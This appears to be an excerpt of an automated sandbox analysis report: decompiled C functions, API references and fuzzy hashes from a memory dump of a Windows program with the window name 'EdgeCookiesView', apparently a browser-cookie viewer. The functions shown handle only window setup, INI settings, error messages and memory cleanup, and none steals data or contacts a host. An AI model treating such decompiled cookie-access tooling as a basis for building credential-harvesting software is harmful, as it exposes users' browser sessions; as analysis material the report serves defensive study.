                                                                                                                                                                    				_v44.hCursor = 0;
                                                                                                                                                                    				_v44.hbrBackground = 0x10;
                                                                                                                                                                    				_v44.lpszMenuName = 0;
                                                                                                                                                                    				RegisterClassW( &_v44);
                                                                                                                                                                    				_t20 = GetModuleHandleW(0);
                                                                                                                                                                    				_t23 = CreateWindowExW(0, L"EdgeCookiesView", L"EdgeCookiesView", 0xcf0000, 0x80000000, 0x80000000, 0x280, 0x1e0, 0, 0, _t20, __esi);
                                                                                                                                                                    				 *(__esi + 0x208) = _t23;
                                                                                                                                                                    				return _t23;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,75144E00,00000000), ref: 0040BAB5
                                                                                                                                                                    • RegisterClassW.USER32 ref: 0040BADA
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040BAE1
                                                                                                                                                                    • CreateWindowExW.USER32 ref: 0040BB05
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                    • String ID: EdgeCookiesView
                                                                                                                                                                    • API String ID: 2678498856-2656830938
                                                                                                                                                                    • Opcode ID: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                                    • Instruction ID: 27e191b6334208d49ef5ca2aa5ba4bd18f44ae4e1b08ed08d13d2dfcc62d9bb3
                                                                                                                                                                    • Opcode Fuzzy Hash: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                                    • Instruction Fuzzy Hash: 3A01C8B1900208AFD711DF9A8D85AFFFBFCEB88710F10402AE915F2251D7B459458BA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                    			E00406DE5(void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                    				void _v8198;
                                                                                                                                                                    				short _v8200;
                                                                                                                                                                    				void* _t18;
                                                                                                                                                                    
                                                                                                                                                                    				E0040E340(0x2004, _t18);
                                                                                                                                                                    				_v8200 = _v8200 & 0x00000000;
                                                                                                                                                                    				memset( &_v8198, 0, 0x2000);
                                                                                                                                                                    				GetPrivateProfileStringW(0x412e48, _a4, 0x40f454,  &_v8200, 0x1000, 0x412c38);
                                                                                                                                                                    				if(_v8200 == 0 || _a12 != 0) {
                                                                                                                                                                    					return WritePrivateProfileStringW(0x412e48, _a4, _a8, 0x412c38);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 00406E0A
                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 00406E32
                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00412E48,?,?,00412C38), ref: 00406E54
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: PrivateProfileString$Writememset
                                                                                                                                                                    • String ID: 8,A$H.A
                                                                                                                                                                    • API String ID: 747731527-1209539780
                                                                                                                                                                    • Opcode ID: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
                                                                                                                                                                    • Instruction ID: e7880ec6ba8d46fe6e1110b4845dc0794c3ddc75899781143fe08dcc0165ab72
                                                                                                                                                                    • Opcode Fuzzy Hash: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
                                                                                                                                                                    • Instruction Fuzzy Hash: 91F0C836501318BAEB205B11CD4DFCB3779DB54714F004471BB05B61C2D3B89A94C6AD
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                    			E004053B1(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                    				char _v2052;
                                                                                                                                                                    				short _v4100;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				long _t15;
                                                                                                                                                                    				long _t16;
                                                                                                                                                                    
                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                    				E0040E340(0x1000, __ecx);
                                                                                                                                                                    				_t16 = _t15;
                                                                                                                                                                    				if(_t16 == 0) {
                                                                                                                                                                    					_t16 = GetLastError();
                                                                                                                                                                    				}
                                                                                                                                                                    				E004052B3(_t16,  &_v2052);
                                                                                                                                                                    				_push( &_v2052);
                                                                                                                                                                    				_push(_t16);
                                                                                                                                                                    				_push(L"Error %d: %s");
                                                                                                                                                                    				_push(0x400);
                                                                                                                                                                    				_push( &_v4100);
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,75144E00,?), ref: 004053C5
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                                    • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                    • Opcode ID: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
                                                                                                                                                                    • Instruction ID: d03f13e4b5835148045d3301d553e71923c4c821524e10c745d4efb14aa9052b
                                                                                                                                                                    • Opcode Fuzzy Hash: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
                                                                                                                                                                    • Instruction Fuzzy Hash: 7BF0277A54020866CB21A795CC01FDA73FCFB44780F0404BBBA05F3181EAB4EA488E59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E0040DB6F(intOrPtr _a4) {
                                                                                                                                                                    				_Unknown_base(*)()* _t3;
                                                                                                                                                                    				void* _t7;
                                                                                                                                                                    				struct HINSTANCE__* _t8;
                                                                                                                                                                    
                                                                                                                                                                    				_t7 = 0;
                                                                                                                                                                    				_t8 = LoadLibraryW(L"shlwapi.dll");
                                                                                                                                                                    				_t3 = GetProcAddress(_t8, "SHAutoComplete");
                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                    					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                                                                    				}
                                                                                                                                                                    				FreeLibrary(_t8);
                                                                                                                                                                    				return _t7;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(shlwapi.dll,74EB48C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                    • API String ID: 145871493-1506664499
                                                                                                                                                                    • Opcode ID: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
                                                                                                                                                                    • Instruction ID: 4ee66759be8abf9dca1a37f43ee2ec86a07497b6dee4ca36e5f36349581f2197
                                                                                                                                                                    • Opcode Fuzzy Hash: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
                                                                                                                                                                    • Instruction Fuzzy Hash: 3ED05B353111506BF7215736AD08EEF3AA5DFC57517050033F904E3152DB744D8A86BD
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E004076F4(intOrPtr* __edi) {
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void** _t11;
                                                                                                                                                                    				intOrPtr* _t18;
                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                    				void* _t28;
                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                    				intOrPtr* _t36;
                                                                                                                                                                    
                                                                                                                                                                    				_t27 = __edi;
                                                                                                                                                                    				 *__edi = 0x410168;
                                                                                                                                                                    				E0040768E(__edi);
                                                                                                                                                                    				_t31 =  *((intOrPtr*)(__edi + 0x14));
                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                    					E00406355(_t31);
                                                                                                                                                                    					_push(_t31);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t32 =  *((intOrPtr*)(_t27 + 0x10));
                                                                                                                                                                    				if(_t32 != 0) {
                                                                                                                                                                    					E00406355(_t32);
                                                                                                                                                                    					_push(_t32);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t33 =  *((intOrPtr*)(_t27 + 0xc));
                                                                                                                                                                    				if(_t33 != 0) {
                                                                                                                                                                    					E00406355(_t33);
                                                                                                                                                                    					_push(_t33);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t34 =  *((intOrPtr*)(_t27 + 8));
                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                    					E00406355(_t34);
                                                                                                                                                                    					_push(_t34);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t18 = _t27;
                                                                                                                                                                    				_pop(_t35);
                                                                                                                                                                    				_push(_t27);
                                                                                                                                                                    				_t36 = _t18;
                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                    				if( *((intOrPtr*)(_t36 + 4)) > 0 &&  *((intOrPtr*)(_t36 + 0x3c)) > 0) {
                                                                                                                                                                    					do {
                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)(E00407588(_t36, _t28))) + 0xc))();
                                                                                                                                                                    						_t28 = _t28 + 1;
                                                                                                                                                                    					} while (_t28 <  *((intOrPtr*)(_t36 + 0x3c)));
                                                                                                                                                                    				}
                                                                                                                                                                    				_t11 =  *((intOrPtr*)( *_t36))();
                                                                                                                                                                    				free( *_t11);
                                                                                                                                                                    				return _t11;
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040770F
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00407722
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00407735
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00407748
                                                                                                                                                                    • free.MSVCRT(00000000), ref: 00407781
                                                                                                                                                                      • Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,75144E00,?,00000000), ref: 0040635C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                    • Opcode ID: 3a37e351f286feef7fe61f1ea2a5e01824fbcdfc648e7528773bb4aad7918a6a
                                                                                                                                                                    • Instruction ID: c8a6b3cb51e6e8f56dec58333c0ea0519a89c45fbe64381fe3d5b910dcd78a78
                                                                                                                                                                    • Opcode Fuzzy Hash: 3a37e351f286feef7fe61f1ea2a5e01824fbcdfc648e7528773bb4aad7918a6a
                                                                                                                                                                    • Instruction Fuzzy Hash: 9901C232E099305BC6257B3AD40191EB3A9AE80BA0316453FE905B73D1CB7C7C518ADE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00406B34(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				struct tagPOINT _v20;
                                                                                                                                                                    				struct tagRECT _v36;
                                                                                                                                                                    				int _t27;
                                                                                                                                                                    				struct HWND__* _t31;
                                                                                                                                                                    				struct HWND__* _t33;
                                                                                                                                                                    
                                                                                                                                                                    				_t31 = _a4;
                                                                                                                                                                    				if((_a8 & 0x00000001) != 0) {
                                                                                                                                                                    					_t33 = GetParent(_t31);
                                                                                                                                                                    					GetWindowRect(_t31,  &_v20);
                                                                                                                                                                    					GetClientRect(_t33,  &_v36);
                                                                                                                                                                    					MapWindowPoints(0, _t33,  &_v20, 2);
                                                                                                                                                                    					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                                                                    					_v20.x = _t27;
                                                                                                                                                                    					SetWindowPos(_t31, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                                                                    				}
                                                                                                                                                                    				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                                    					E00405D0F(_t31, 0x400000);
                                                                                                                                                                    				}
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}










                                                                                                                                                                    APIs
                                                                                                                                                                    • GetParent.USER32(?), ref: 00406B46
                                                                                                                                                                    • GetWindowRect.USER32 ref: 00406B53
                                                                                                                                                                    • GetClientRect.USER32 ref: 00406B5E
                                                                                                                                                                    • MapWindowPoints.USER32 ref: 00406B6E
                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00406B8A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                    • Opcode ID: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                                    • Instruction ID: 8e7a0edbc95fdcc56b15363f287b575cc5c7f3f2b2b94fa66e9be29a0ee7bcd8
                                                                                                                                                                    • Opcode Fuzzy Hash: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 48015732400129ABDB219BA59C49EFFBFBCEF06714F04413AF901F2080D778A5058BA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                    			E00409F23(void* __eax, int __ebx, void* _a4) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				void* _t20;
                                                                                                                                                                    				void* _t21;
                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                    				void* _t32;
                                                                                                                                                                    				void* _t34;
                                                                                                                                                                    
                                                                                                                                                                    				_t20 = __eax;
                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                    				_t28 = __eax - 1;
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				_v16 = __eax;
                                                                                                                                                                    				if(_t28 > 0) {
                                                                                                                                                                    					_t21 = _a4;
                                                                                                                                                                    					_v8 = __ebx;
                                                                                                                                                                    					_v8 =  ~_v8;
                                                                                                                                                                    					_t32 = _t28 * __ebx + _t21;
                                                                                                                                                                    					_a4 = _t21;
                                                                                                                                                                    					do {
                                                                                                                                                                    						memcpy(_v16, _a4, __ebx);
                                                                                                                                                                    						memcpy(_a4, _t32, __ebx);
                                                                                                                                                                    						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                                                                                    						_a4 = _a4 + __ebx;
                                                                                                                                                                    						_t32 = _t32 + _v8;
                                                                                                                                                                    						_t34 = _t34 + 0x24;
                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                    						_t28 = _t28 - 1;
                                                                                                                                                                    					} while (_t28 > _v12);
                                                                                                                                                                    				}
                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                    				L0040E032();
                                                                                                                                                                    				return _t20;
                                                                                                                                                                    			}












                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$??2@??3@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1252195045-0
                                                                                                                                                                    • Opcode ID: 84cba42ff6f7e9e76cb5b3eb48464ce6a132065f142cfd3aba4b79740acf243f
                                                                                                                                                                    • Instruction ID: 9c944120e002927f8eec2413523e8dcd2a94c32319e751658ec61dd6637171fa
                                                                                                                                                                    • Opcode Fuzzy Hash: 84cba42ff6f7e9e76cb5b3eb48464ce6a132065f142cfd3aba4b79740acf243f
                                                                                                                                                                    • Instruction Fuzzy Hash: C0012172C00118BBDF106FAAD8819DEBFB9EF44394F10807AF808B6152D6755E559B98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                    			E00403054(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                    				struct HDWP__* _t31;
                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                    				RECT* _t36;
                                                                                                                                                                    
                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_t34 = __ecx;
                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                    				if(_a4 != 5) {
                                                                                                                                                                    					if(_a4 != 0xf) {
                                                                                                                                                                    						if(_a4 == 0x24) {
                                                                                                                                                                    							_t15 = _a12;
                                                                                                                                                                    							 *((intOrPtr*)(_t15 + 0x18)) = 0xc8;
                                                                                                                                                                    							 *((intOrPtr*)(_t15 + 0x1c)) = 0x78;
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						E00401810(__ecx + 0x40);
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t31 = BeginDeferWindowPos(3);
                                                                                                                                                                    					_t36 = _t34 + 0x40;
                                                                                                                                                                    					E004017E9(_t36, _t31, 0x3f1, 0, 0, 1);
                                                                                                                                                                    					E004017E9(_t36, _t31, 1, 1, 1, 0);
                                                                                                                                                                    					E004017E9(_t36, _t31, 2, 1, 1, 0);
                                                                                                                                                                    					EndDeferWindowPos(_t31);
                                                                                                                                                                    					InvalidateRect( *(_t36 + 0x10), _t36, 1);
                                                                                                                                                                    					_t34 = _v8;
                                                                                                                                                                    				}
                                                                                                                                                                    				return E004015CE(_t34, _a4, _a8, _a12);
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 00403068
                                                                                                                                                                      • Part of subcall function 004017E9: GetDlgItem.USER32 ref: 004017F2
                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040309E
                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004030A9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeferWindow$BeginInvalidateItemRect
                                                                                                                                                                    • String ID: $
                                                                                                                                                                    • API String ID: 4234876885-3993045852
                                                                                                                                                                    • Opcode ID: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                                    • Instruction ID: 5bd367454bd051cdd9e75425df65f1b17fedc8d2c9609545a756db00ac89be97
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                                    • Instruction Fuzzy Hash: 65119171140208FFEB215F51CCC5F6F3AACEB05799F10403AF5053A1D0D675AE459BA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                    			E00409457(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                    				void _v514;
                                                                                                                                                                    				signed short _v516;
                                                                                                                                                                    				void _v1026;
                                                                                                                                                                    				signed short _v1028;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t17;
                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                    				signed short* _t28;
                                                                                                                                                                    
                                                                                                                                                                    				_v516 = _v516 & 0x00000000;
                                                                                                                                                                    				_t26 = __ecx;
                                                                                                                                                                    				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                    				_v1028 = _v1028 & 0x00000000;
                                                                                                                                                                    				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                    				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                                                                    				_t28 =  &_v516;
                                                                                                                                                                    				E004086F5(_t28, _t17);
                                                                                                                                                                    				_push(_t28);
                                                                                                                                                                    				_push(L"</%s>\r\n");
                                                                                                                                                                    				_push(0xff);
                                                                                                                                                                    				_push( &_v1028);
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				return E00408857(_t26, _t26, _a4,  &_v1028);
                                                                                                                                                                    			}












                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 0040947B
                                                                                                                                                                    • memset.MSVCRT ref: 00409492
                                                                                                                                                                      • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                                      • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004094C1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                    • Opcode ID: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                                    • Instruction ID: 85b546f447cb05eec590fc4b387cecce4986b1e61cf39ba9e2c32341b3a77f5f
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                                    • Instruction Fuzzy Hash: AE0186B3E0012966D720BB55CC45FEA767CEF45318F0004BABB09F71C2DB789E558A98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                    			E00406C43(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                    				void _v8198;
                                                                                                                                                                    				short _v8200;
                                                                                                                                                                    				void* _t9;
                                                                                                                                                                    				void* _t12;
                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                    
                                                                                                                                                                    				_t19 = __ecx;
                                                                                                                                                                    				_t9 = E0040E340(0x2004, __ecx);
                                                                                                                                                                    				_t20 = _t19;
                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                    					_t20 =  *0x412ec8; // 0x0
                                                                                                                                                                    				}
                                                                                                                                                                    				_t25 =  *0x412c38;
                                                                                                                                                                    				if( *0x412c38 != 0) {
                                                                                                                                                                    					_v8200 = _v8200 & 0x00000000;
                                                                                                                                                                    					memset( &_v8198, 0, 0x2000);
                                                                                                                                                                    					_push(_t20);
                                                                                                                                                                    					_t12 = 5;
                                                                                                                                                                    					E00406CC6(_t12);
                                                                                                                                                                    					if(E00406D72(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                                                                    						SetWindowTextW(_a4,  &_v8200);
                                                                                                                                                                    					}
                                                                                                                                                                    					return EnumChildWindows(_a4, E00406BAC, 0);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t9;
                                                                                                                                                                    			}










                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
